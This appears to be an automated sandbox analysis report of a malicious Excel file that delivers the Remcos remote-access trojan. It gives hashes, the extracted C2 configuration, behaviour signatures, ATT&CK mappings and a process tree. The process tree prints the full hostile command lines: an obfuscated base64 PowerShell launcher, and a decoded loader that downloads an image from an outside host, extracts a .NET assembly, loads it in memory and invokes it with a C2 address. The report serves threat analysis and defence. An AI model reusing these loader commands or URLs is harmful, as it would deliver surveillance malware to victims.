Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    16-04-2024 15:32

General

  • Target

    new.xls

  • Size

    162KB

  • MD5

    3656be2ecdf6e61566462ef1488090ad

  • SHA1

    09de9cf6875a005f44bed96ed5ef95903b1c79ef

  • SHA256

    7ae95a8a8acbb5edb84c2972ac93b61f525c74d9731d2d72af88e53a40faf01e

  • SHA512

    c7c4fad2497ed78611a557d93460b3069fe53e79fbb7da03e5b7468dc607e2a9fa608a1e380e0ad5e0794094daef4df00114d85a0485a17d9cda0f27535bd9f3

  • SSDEEP

    3072:AXkJAg15J68xcYy/iCkku4+CyX4l9WGodWRtFxNP8l4eXa0H1G:AXunJ1cYy/ElCwW9zodWtF0l4en

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

rmcnewlistening.duckdns.org:14645

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-AK1F22

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 6 IoCs
  • Abuses OpenXML format to download file from external location
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\new.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2212
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2828
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1916
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\exampleofkissinglovers.vbs"
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBODgTreE0DgTreRwDgTrevDgTreDUDgTreNQDgTre0DgTreDUDgTreLwDgTre4DgTreDEDgTreMgDgTreuDgTreDUDgTreOQDgTreuDgTreDMDgTreLgDgTreyDgTreDkDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreRwBNDgTreE4DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1764
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NMG/5545/812.59.3.291//:ptth' , '1' , 'C:\ProgramData\' , 'GMN','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\GMN.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2988
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Drops file in Windows directory
              • Suspicious use of WriteProcessMemory
              PID:2640
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\viukkswkgihtujkdkxlosperqpdnoza.vbs"
                6⤵
                  PID:2064
          • C:\Windows\SysWOW64\certutil.exe
            "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\Admin\AppData\Local\DesktopPic\WallP.exe"
            3⤵
              PID:2208
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\Admin\AppData\Local\DesktopPic\PicList.txt"
              3⤵
                PID:1048

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Exploitation for Client Execution

          1
          T1203

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Defense Evasion

          Modify Registry

          2
          T1112

          Discovery

          System Information Discovery

          2
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
            Filesize

            1KB

            MD5

            8a19e2f05bb9c727f7fb24ef7e6541e7

            SHA1

            fc4e212ec0c090fffc2c1b9c70fe5cb6c77592db

            SHA256

            7eb17f03f49ad906d62f715fe4e81e9341f8e7e900e429bc83d0787340dfa42f

            SHA512

            82b40631302b2338d74c48aaf0b848435020936eb99a1945a6a5397e123a6107eb5681d458595af641d4078383de41370afc882d94aec89e4c65f51e86c4c0d4

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
            Filesize

            68KB

            MD5

            29f65ba8e88c063813cc50a4ea544e93

            SHA1

            05a7040d5c127e68c25d81cc51271ffb8bef3568

            SHA256

            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

            SHA512

            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
            Filesize

            724B

            MD5

            8202a1cd02e7d69597995cabbe881a12

            SHA1

            8858d9d934b7aa9330ee73de6c476acf19929ff6

            SHA256

            58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

            SHA512

            97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
            Filesize

            410B

            MD5

            b6758a3f36217f6739eaaa3bf7c0218b

            SHA1

            b058e4868a3dc20516ba0cdd4b6750b176b3c580

            SHA256

            a8f6e9684587632b4fd964d7b3a57b98b70d272236c3515ac46cd2d427551d6c

            SHA512

            44a8dcdc6767470977bd80a536bc09085a1b03c9caf6f6d25fc42f1b600e4727cdd18a4b3b583f99a6d885eca4cb77a08feb691bdd991114601589e190105025

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            05709b16b0759fedf5e8e97e4462bfe8

            SHA1

            8203b12f5db4770bd6b477417bd8a7dc9066fb42

            SHA256

            43f51e65f921027aab36301f0af99e7d5ddd67ade79d89cc1ad2b3cb58d8e977

            SHA512

            fce5fbfcbec571e53eadd433d9423f790f862d985cd3f7752844e627f54bbd52909c7d3fc351b2d0740e1841cb24c06552288d9269098e2b52ed5059b31cfd58

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            d453b9ec8736a60108efb3d6528eb91f

            SHA1

            dfb3fc904366e95c78ad3a5f6b3d574f7e519f8d

            SHA256

            ea3c49e89cb8aa52fe652495da22e67540e7988590158e3598b9eff66f895601

            SHA512

            5d3f103ad6530f78df3d4dbea8dc778261b58edbe9ca77f2f43ee542639d615c9667d973d50384e78f45cf1472268e8446bf753feb4f64a591e803fd4cc4c27a

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
            Filesize

            392B

            MD5

            1ef32ff5f1ecd8b959a69e718b8ed897

            SHA1

            e820dc4f567a8c10771570d27bfffe6ee1f9efce

            SHA256

            5f7db0303c432235ab4bfedd7aa0b63460d9f22dfcedb43530bae11a13820405

            SHA512

            b3846b52c7c03afa2fb3c7f8fff045901855b87daec1088fa61cbb06e1921bb7bebe8bc993e3e769353eb80070571788f51363e78aefd3f27a4d35b9ff307ae1

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{F66EC8FF-46F9-4792-9E03-0852BACA9BD3}.FSD
            Filesize

            128KB

            MD5

            078f5bd61263b7f40e32077f729af61f

            SHA1

            d2b2ccc6147d762fa284d3e9c527914ecd229690

            SHA256

            91e742ac9f845b56f22daa227d6643821c46404303fbaa6f94a1609e09577030

            SHA512

            81a0534fbc29c50a4a5351fe0ca6351acd52c5ede8f0d827108ec772310377814035211fca6536c4def8aefd43be9305840a54680700561c4b60e60485aa1db6

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
            Filesize

            128KB

            MD5

            fb44f3372709c22dec78ab7b1552de67

            SHA1

            1bd79f47a07e06303adffe470d108a0332196e41

            SHA256

            7f229b45da4e150add382bbba832b0f5dcb9a3c31304a0b5478d4912553c0644

            SHA512

            c6b3a1923592f28b523578f361bce2907806db24a7fe7c648002181e5bc054faabe340152e132b20eccc9ab513d63581edbd83fdbc7d20536f9c44f59315d5c3

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{AD87DCCF-9385-44C1-8B7D-991DCF299C82}.FSD
            Filesize

            128KB

            MD5

            3c36d0351ad70c5f248ee90e2c41afe4

            SHA1

            92f7dca06f1f1543476012b5331f2faa6f8f32a3

            SHA256

            cd933d16f09f764022b9110b3ac29f58ea608018a89d72c82558cabd25237f31

            SHA512

            8baed951189f3ebfc452e4574acc168de77a5646c123d6d1a406467291d7c3ef0765e7a65338d70b672f47e28a4ab2877a74e8ec41b6b7bd8b43015c402bb2d2

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\needfreshlovequotestotakeyouininterestedkisserloverwhohavesuchamemorytoloveherkisshertrulyfor__sheisbeautifulgirl[1].doc
            Filesize

            65KB

            MD5

            c7d0967e4b8c8a0a1309e97d549b828d

            SHA1

            61cd7eb2ee3b0e0664b5efd753a342c5a2ceb7fd

            SHA256

            3d9744bfdd9d8e6dc31dd3f8b6485a0acb76d96dc0dd121248e29a3d975b600f

            SHA512

            82eedbf550f28b70a3c6b59c3bdaa7f7d70e6d52acb361a98512e10db230cd16b507b72545210daba2843c8105b921c02cd9919be8534529884b62233684e1b5

          • C:\Users\Admin\AppData\Local\Temp\CabAB9C.tmp
            Filesize

            65KB

            MD5

            ac05d27423a85adc1622c714f2cb6184

            SHA1

            b0fe2b1abddb97837ea0195be70ab2ff14d43198

            SHA256

            c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

            SHA512

            6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

          • C:\Users\Admin\AppData\Local\Temp\TarB472.tmp
            Filesize

            171KB

            MD5

            9c0c641c06238516f27941aa1166d427

            SHA1

            64cd549fb8cf014fcd9312aa7a5b023847b6c977

            SHA256

            4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

            SHA512

            936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

          • C:\Users\Admin\AppData\Local\Temp\TarC7FA.tmp
